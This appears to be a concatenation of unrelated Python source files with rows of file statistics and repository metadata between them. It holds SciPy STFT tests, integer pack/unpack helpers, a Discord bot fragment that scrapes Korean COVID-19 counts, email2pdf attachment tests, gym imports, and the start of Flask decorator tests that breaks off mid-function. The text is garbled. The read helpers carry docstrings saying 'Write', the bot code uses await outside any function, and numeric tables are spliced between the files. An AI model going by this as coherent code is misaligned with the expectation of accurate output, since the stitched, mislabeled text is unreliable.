assert_raises(ValueError, _spectral_helper, x[:512], x[512:],
mode='stft')
assert_raises(ValueError, _spectral_helper, x, x, boundary='foo')
def test_check_COLA(self):
settings = [
('boxcar', 10, 0),
('boxcar', 10, 9),
('bartlett', 51, 26),
('hann', 256, 128),
('hann', 256, 192),
('blackman', 300, 200),
(('tukey', 0.5), 256, 64),
('hann', 256, 255),
]
for setting in settings:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(True, check_COLA(*setting), err_msg=msg)
def test_check_NOLA(self):
settings_pass = [
('boxcar', 10, 0),
('boxcar', 10, 9),
('boxcar', 10, 7),
('bartlett', 51, 26),
('bartlett', 51, 10),
('hann', 256, 128),
('hann', 256, 192),
('hann', 256, 37),
('blackman', 300, 200),
('blackman', 300, 123),
(('tukey', 0.5), 256, 64),
(('tukey', 0.5), 256, 38),
('hann', 256, 255),
('hann', 256, 39),
]
for setting in settings_pass:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(True, check_NOLA(*setting), err_msg=msg)
w_fail = np.ones(16)
w_fail[::2] = 0
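# zeroing every other sample leaves points where the overlap-added squared window vanishes, so NOLA cannot hold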
settings_fail = [
(w_fail, len(w_fail), len(w_fail) // 2),
('hann', 64, 0),
]
for setting in settings_fail:
msg = '{0}, {1}, {2}'.format(*setting)
assert_equal(False, check_NOLA(*setting), err_msg=msg)
def test_average_all_segments(self):
np.random.seed(1234)
x = np.random.randn(1024)
fs = 1.0
window = 'hann'
nperseg = 16
noverlap = 8
# Compare twosided, because onesided welch doubles non-DC terms to
# account for power at negative frequencies. stft doesn't do this,
# because it breaks invertibility.
f, _, Z = stft(x, fs, window, nperseg, noverlap, padded=False,
return_onesided=False, boundary=None)
fw, Pw = welch(x, fs, window, nperseg, noverlap, return_onesided=False,
scaling='spectrum', detrend=False)
assert_allclose(f, fw)
assert_allclose(np.mean(np.abs(Z)**2, axis=-1), Pw)
def test_permute_axes(self):
np.random.seed(1234)
x = np.random.randn(1024)
fs = 1.0
window = 'hann'
nperseg = 16
noverlap = 8
f1, t1, Z1 = stft(x, fs, window, nperseg, noverlap)
f2, t2, Z2 = stft(x.reshape((-1, 1, 1)), fs, window, nperseg, noverlap,
axis=0)
t3, x1 = istft(Z1, fs, window, nperseg, noverlap)
t4, x2 = istft(Z2.T, fs, window, nperseg, noverlap, time_axis=0,
freq_axis=-1)
assert_allclose(f1, f2)
assert_allclose(t1, t2)
assert_allclose(t3, t4)
assert_allclose(Z1, Z2[:, 0, 0, :])
assert_allclose(x1, x2[:, 0, 0])
def test_roundtrip_real(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
('bartlett', 101, 51, 26), # Test odd nperseg
('hann', 1024, 256, 128), # Test defaults
(('tukey', 0.5), 1152, 256, 64), # Test Tukey
('hann', 1024, 256, 255), # Test overlapped hann
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
def test_roundtrip_not_nola(self):
np.random.seed(1234)
w_fail = np.ones(16)
w_fail[::2] = 0
settings = [
(w_fail, 256, len(w_fail), len(w_fail) // 2),
('hann', 256, 64, 0),
]
for window, N, nperseg, noverlap in settings:
msg = '{0}, {1}, {2}, {3}'.format(window, N, nperseg, noverlap)
assert not check_NOLA(window, nperseg, noverlap), msg
t = np.arange(N)
x = 10 * np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary='zeros')
with pytest.warns(UserWarning, match='NOLA'):
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, boundary=True)
assert np.allclose(t, tr[:len(t)]), msg
assert not np.allclose(x, xr[:len(x)]), msg
def test_roundtrip_nola_not_cola(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 3), # NOLA True, COLA False
('bartlett', 101, 51, 37), # NOLA True, COLA False
('hann', 1024, 256, 127), # NOLA True, COLA False
(('tukey', 0.5), 1152, 256, 14), # NOLA True, COLA False
('hann', 1024, 256, 5), # NOLA True, COLA False
]
for window, N, nperseg, noverlap in settings:
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert check_NOLA(window, nperseg, noverlap), msg
assert not check_COLA(window, nperseg, noverlap), msg
t = np.arange(N)
x = 10 * np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary='zeros')
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, boundary=True)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr[:len(t)], err_msg=msg)
assert_allclose(x, xr[:len(x)], err_msg=msg)
def test_roundtrip_float32(self):
np.random.seed(1234)
settings = [('hann', 1024, 256, 128)]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
x = x.astype(np.float32)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg, rtol=1e-4, atol=1e-5)
assert_(x.dtype == xr.dtype)
def test_roundtrip_complex(self):
np.random.seed(1234)
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
('bartlett', 101, 51, 26), # Test odd nperseg
('hann', 1024, 256, 128), # Test defaults
(('tukey', 0.5), 1152, 256, 64), # Test Tukey
('hann', 1024, 256, 255), # Test overlapped hann
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size) + 10j*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False,
return_onesided=False)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, input_onesided=False)
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
# Check that asking for onesided switches to twosided
with suppress_warnings() as sup:
sup.filter(UserWarning,
"Input data is complex, switching to return_onesided=False")
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=False,
return_onesided=True)
tr, xr = istft(zz, nperseg=nperseg, noverlap=noverlap,
window=window, input_onesided=False)
msg = '{0}, {1}, {2}'.format(window, nperseg, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
def test_roundtrip_boundary_extension(self):
np.random.seed(1234)
# Test against boxcar: since the window is all ones, the signal can be
# fully recovered with no boundary extension
settings = [
('boxcar', 100, 10, 0), # Test no overlap
('boxcar', 100, 10, 9), # Test high overlap
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary=None)
_, xr = istft(zz, noverlap=noverlap, window=window, boundary=False)
for boundary in ['even', 'odd', 'constant', 'zeros']:
_, _, zz_ext = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True,
boundary=boundary)
_, xr_ext = istft(zz_ext, noverlap=noverlap, window=window,
boundary=True)
msg = '{0}, {1}, {2}'.format(window, noverlap, boundary)
assert_allclose(x, xr, err_msg=msg)
assert_allclose(x, xr_ext, err_msg=msg)
def test_roundtrip_padded_signal(self):
np.random.seed(1234)
settings = [
('boxcar', 101, 10, 0),
('hann', 1000, 256, 128),
]
for window, N, nperseg, noverlap in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
_, _, zz = stft(x, nperseg=nperseg, noverlap=noverlap,
window=window, detrend=None, padded=True)
tr, xr = istft(zz, noverlap=noverlap, window=window)
msg = '{0}, {1}'.format(window, noverlap)
# Account for possible zero-padding at the end
assert_allclose(t, tr[:t.size], err_msg=msg)
assert_allclose(x, xr[:x.size], err_msg=msg)
def test_roundtrip_padded_FFT(self):
np.random.seed(1234)
settings = [
('hann', 1024, 256, 128, 512),
('hann', 1024, 256, 128, 501),
('boxcar', 100, 10, 0, 33),
(('tukey', 0.5), 1152, 256, 64, 1024),
]
for window, N, nperseg, noverlap, nfft in settings:
t = np.arange(N)
x = 10*np.random.randn(t.size)
xc = x*np.exp(1j*np.pi/4)
# real signal
_, _, z = stft(x, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, detrend=None, padded=True)
# complex signal
_, _, zc = stft(xc, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, detrend=None, padded=True,
return_onesided=False)
tr, xr = istft(z, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window)
tr, xcr = istft(zc, nperseg=nperseg, noverlap=noverlap, nfft=nfft,
window=window, input_onesided=False)
msg = '{0}, {1}'.format(window, noverlap)
assert_allclose(t, tr, err_msg=msg)
assert_allclose(x, xr, err_msg=msg)
assert_allclose(xc, xcr, err_msg=msg)
def test_axis_rolling(self):
np.random.seed(1234)
x_flat = np.random.randn(1024)
_, _, z_flat = stft(x_flat)
for a in range(3):
newshape = [1,]*3
newshape[a] = -1
x = x_flat.reshape(newshape)
_, _, z_plus = stft(x, axis=a) # Positive axis index
_, _, z_minus = stft(x, axis=a-x.ndim) # Negative axis index
assert_equal(z_flat, z_plus.squeeze(), err_msg=a)
assert_equal(z_flat, z_minus.squeeze(), err_msg=a-x.ndim)
# z_flat has shape [n_freq, n_time]
# Test vs. transpose
_, x_transpose_m = istft(z_flat.T, time_axis=-2, freq_axis=-1)
_, x_transpose_p = istft(z_flat.T, time_axis=0, freq_axis=1)
assert_allclose(x_flat, x_transpose_m, err_msg='istft transpose minus')
assert_allclose(x_flat, x_transpose_p, err_msg='istft transpose plus')
| 36.448087
| 105
| 0.535982
| 7,587
| 53,360
| 3.654804
| 0.060498
| 0.082297
| 0.018176
| 0.022936
| 0.841934
| 0.818601
| 0.791518
| 0.754914
| 0.721699
| 0.694327
| 0
| 0.104996
| 0.323707
| 53,360
| 1,463
| 106
| 36.473001
| 0.663397
| 0.066417
| 0
| 0.707904
| 0
| 0
| 0.021896
| 0.000423
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.094502
| false
| 0.001718
| 0.007732
| 0
| 0.108247
| 0.000859
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9a468bb8b5472d274f4b8ce624d28bfddfccd63
| 1,557
|
py
|
Python
|
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | null | null | null |
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | 2
|
2019-01-28T10:22:14.000Z
|
2019-01-28T10:40:45.000Z
|
binary/integer.py
|
deadlock-delegate/binary
|
a643787be0070c35273057c4a176fe0f1588f1c5
|
[
"MIT"
] | 2
|
2018-06-27T16:51:33.000Z
|
2019-01-28T10:13:53.000Z
|
from struct import pack, unpack_from
def read_bit8(data, offset=0):
"""Write a signed 8 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('b', data, offset)[0]
def read_bit16(data, offset=0):
"""Write a signed 16 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('h', data, offset)[0]
def read_bit32(data, offset=0):
"""Write a signed 32 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('l', data, offset)[0]
def read_bit64(data, offset=0):
"""Write a signed 64 bit integer
Args:
data (bytes)
Returns:
int
"""
return unpack_from('q', data, offset)[0]
def write_bit8(data):
"""Write a signed 8 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('b', data)
def write_bit16(data):
"""Write a signed 16 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('h', data)
def write_bit32(data):
"""Write a signed 32 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('l', data)
def write_bit64(data):
"""Write a signed 64 bit integer
Args:
data (int)
Returns:
bytes: bytes object containing value from data
"""
return pack('q', data)
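A minimal roundtrip sketch for the helpers above (assuming the corrected write_* functions, which return the packed bytes instead of indexing into them; the byte values shown assume the platform's native little-endian layout):
# hypothetical usage, not part of the original module
value = -1234
payload = write_bit16(value) # b'.\xfb' on a little-endian machine
assert read_bit16(payload) == value # unpacks back to -1234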
| 15.887755
| 54
| 0.569685
| 206
| 1,557
| 4.242718
| 0.174757
| 0.091533
| 0.100687
| 0.16476
| 0.814645
| 0.75286
| 0.702517
| 0.702517
| 0.576659
| 0.576659
| 0
| 0.037594
| 0.316635
| 1,557
| 97
| 55
| 16.051546
| 0.783835
| 0.473346
| 0
| 0
| 0
| 0
| 0.013093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.470588
| false
| 0
| 0.058824
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6a01cfafc9d5a5b2262f178a1438c1c0c9c51edc
| 6,604
|
py
|
Python
|
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | 1
|
2021-06-07T05:43:18.000Z
|
2021-06-07T05:43:18.000Z
|
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | null | null | null |
coivd19.py
|
ksy53576/machim_client_src
|
813b711d032ab35f76efd91f5ceb4a471d73c10a
|
[
"MIT"
] | 1
|
2021-06-12T08:47:49.000Z
|
2021-06-12T08:47:49.000Z
|
if message.content.startswith('.코로나'): # triggered when a message starting with '.코로나' (COVID) is detected
url = 'http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=11&ncvContSeq=&contSeq=&board_id=&gubun='
html = urllib.request.urlopen(url)
soup = BeautifulSoup(html, "html.parser")
datecr = soup.find('span', {'class': 't_date'}) # reference date
#print(f'As of: {datecr.string}')
totalcovid = soup.select('dd.ca_value')[0].text # cumulative confirmed cases
#print(f'Cumulative confirmed: {totalcovid}')
todaytotalcovid = soup.select('p.inner_value')[0].text # subtotal of today's confirmed cases
#print(f'Confirmed subtotal: {todaytotalcovid}')
todaydomecovid = soup.select('p.inner_value')[1].text # today's locally transmitted cases
#print(f'Local transmission: {todaydomecovid}')
todayforecovid = soup.select('p.inner_value')[2].text # today's imported cases
#print(f'Imported: {todayforecovid}')
totalca = soup.select('dd.ca_value')[2].text # cumulative released from isolation
#print(f'Cumulative released: {totalca}')
todayca = soup.select('span.txt_ntc')[0].text # released from isolation today
#print(f'Released: {todayca}')
totalcaing = soup.select('dd.ca_value')[4].text # cumulative currently in isolation
#print(f'Cumulative in isolation: {totalcaing}')
todaycaing = soup.select('span.txt_ntc')[1].text # in isolation today
#print(f'In isolation: {todaycaing}')
totaldead = soup.select('dd.ca_value')[6].text # cumulative deaths
#print(f'Cumulative deaths: {totaldead}')
todaydead = soup.select('span.txt_ntc')[2].text # deaths today
#print(f'Deaths: {todaydead}')
covidembed = discord.Embed(title='코로나19 국내 발생현황', description="", color=0xFF0F13, url='http://ncov.mohw.go.kr/')
covidembed.add_field(name='🦠 확진환자', value=f'{totalcovid}({todaytotalcovid}) 명'
f'\n\n국내발생: {todaydomecovid} 명\n해외유입: {todayforecovid} 명', inline=False)
covidembed.add_field(name='😷 격리중', value=f'{totalcaing}({todaycaing}) 명', inline=False)
covidembed.add_field(name='🆓 격리해제', value=f'{totalca}({todayca}) 명', inline=False)
covidembed.add_field(name='💀 사망자', value=f'{totaldead}({todaydead}) 명', inline=False)
covidembed.set_footer(text=datecr.string)
await message.channel.send(embed=covidembed)
| 48.20438
| 120
| 0.608268
| 888
| 6,604
| 4.476351
| 0.120496
| 0.049811
| 0.036226
| 0.042264
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.01104
| 0.218201
| 6,604
| 136
| 121
| 48.558824
| 0.756537
| 0.203362
| 0
| 0.970149
| 0
| 0.044776
| 0.271624
| 0.046812
| 0
| 0
| 0.004623
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a2ea0b4604e8a34db8d23be89cbe79ef79b9a69
| 105
|
py
|
Python
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 10
|
2016-06-26T07:47:12.000Z
|
2022-03-25T01:28:27.000Z
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 3
|
2019-01-26T03:33:37.000Z
|
2020-06-19T10:44:12.000Z
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 2
|
2018-08-24T01:15:43.000Z
|
2020-09-16T21:26:02.000Z
|
from add_two_ints import *
from sub_two_ints import *
from mul_two_ints import *
from fibonacci import *
| 21
| 26
| 0.809524
| 18
| 105
| 4.388889
| 0.444444
| 0.265823
| 0.493671
| 0.64557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152381
| 105
| 4
| 27
| 26.25
| 0.88764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e03375726e2ce3461b59dc06044ac07300d735e5
| 7,139
|
py
|
Python
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 59
|
2015-10-26T15:33:37.000Z
|
2022-02-25T08:17:10.000Z
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 84
|
2015-01-03T17:38:26.000Z
|
2021-12-11T11:43:18.000Z
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 38
|
2015-06-10T15:22:20.000Z
|
2022-03-31T19:16:17.000Z
|
from email.mime.multipart import MIMEMultipart
import os
from tests.BaseTestClasses import Email2PDFTestCase
class AttachmentDetection(Email2PDFTestCase):
def setUp(self):
super(AttachmentDetection, self).setUp()
self.msg = MIMEMultipart()
def test_pdf_as_octet_stream(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", extension="pdf")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_as_octet_stream_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", extension="xyz", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_as_octet_stream_no_body(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly(extraParams=['--no-body'])
self.assertEqual('', error)
self.assertFalse(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_as_octet_stream(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, content_type="application/octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, extension="blah")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_as_octet_stream_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, content_type="application/octet-stream", extension="xyz")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_word_document(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachAttachment("application", "vnd.openxmlformats-officedocument.wordprocessingml.document",
"Word document content", "somefile.docx")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, "somefile.docx")))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_unidentified_file(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachAttachment("application", "data", "some data in some format", "somefile.xyz")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, "somefile.xyz")))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachment_filename_has_encoding(self):
path = os.path.join(self.workingDir, "somefile.xyz")
self.attachAttachment("application", "data", "some data in some format", "somefile.xyz", file_name_encoding="utf-8")
(rc, output, error) = self.invokeAsSubprocess(extraParams=['--no-body'])
self.assertTrue(os.path.exists(path))
self.assertEqual('', error)
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
| 52.492647
| 132
| 0.701359
| 748
| 7,139
| 6.617647
| 0.113636
| 0.032727
| 0.080606
| 0.07899
| 0.902222
| 0.89697
| 0.883838
| 0.883838
| 0.860606
| 0.860606
| 0
| 0.000509
| 0.174534
| 7,139
| 135
| 133
| 52.881481
| 0.839471
| 0
| 0
| 0.727273
| 0
| 0
| 0.135313
| 0.014988
| 0
| 0
| 0
| 0
| 0.528926
| 1
| 0.090909
| false
| 0
| 0.024793
| 0
| 0.123967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ee35ff60a09434cd6ba68e42216976aad94ea3c
| 101
|
py
|
Python
|
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
from gym_foster.envs.foster_env import FosterEnv
from gym_foster.envs.fosterA_env import FosterAEnv
| 25.25
| 50
| 0.871287
| 16
| 101
| 5.25
| 0.5625
| 0.166667
| 0.309524
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089109
| 101
| 3
| 51
| 33.666667
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ee63f7a4811a04bdd2037059e1870fffabc37d7
| 11,045
|
py
|
Python
|
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import url_for, Response, make_response
from flask_jwt_extended import create_access_token
from tests.web.web_test_base import WebTestBase
def fake_route() -> Response:
return make_response({'data': 'abc123'})
class TestDecorators(WebTestBase):
@staticmethod
def fake_header():
access_token = create_access_token(identity='abcd')
return {'Authorization': f'Bearer {access_token}'}
def test_oauth_decorator_auth_disabled(self, client):
from servicex.decorators import oauth_required
with client.application.app_context():
decorated = oauth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_oauth_decorator_not_signed_in(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import oauth_required
decorated = oauth_required(fake_route)
response = decorated()
assert response.status_code == 302
assert response.location == url_for('sign_in')
def test_oauth_decorator_not_saved(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.session_transaction() as sess:
sess['is_authenticated'] = True
response: Response = client.get(url_for('profile'))
assert response.status_code == 302
assert response.location == url_for('create_profile', _external=True)
def test_oauth_decorator_saved(self, client, user, captured_templates):
client.application.config['ENABLE_AUTH'] = True
user.id = 7
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['user_id'] = user.id
resp: Response = client.get(url_for('profile'))
assert resp.status_code == 200
template, context = captured_templates[0]
assert template.name == "profile.html"
assert context["user"] == user
def test_auth_decorator_auth_disabled(self, client):
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_auth_decorator_user_deleted(self, mocker, mock_jwt_extended):
mocker.patch('servicex.decorators.UserModel.find_by_sub',
return_value=None)
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_auth_decorator_user_pending(self, mock_jwt_extended, user):
user.pending = True
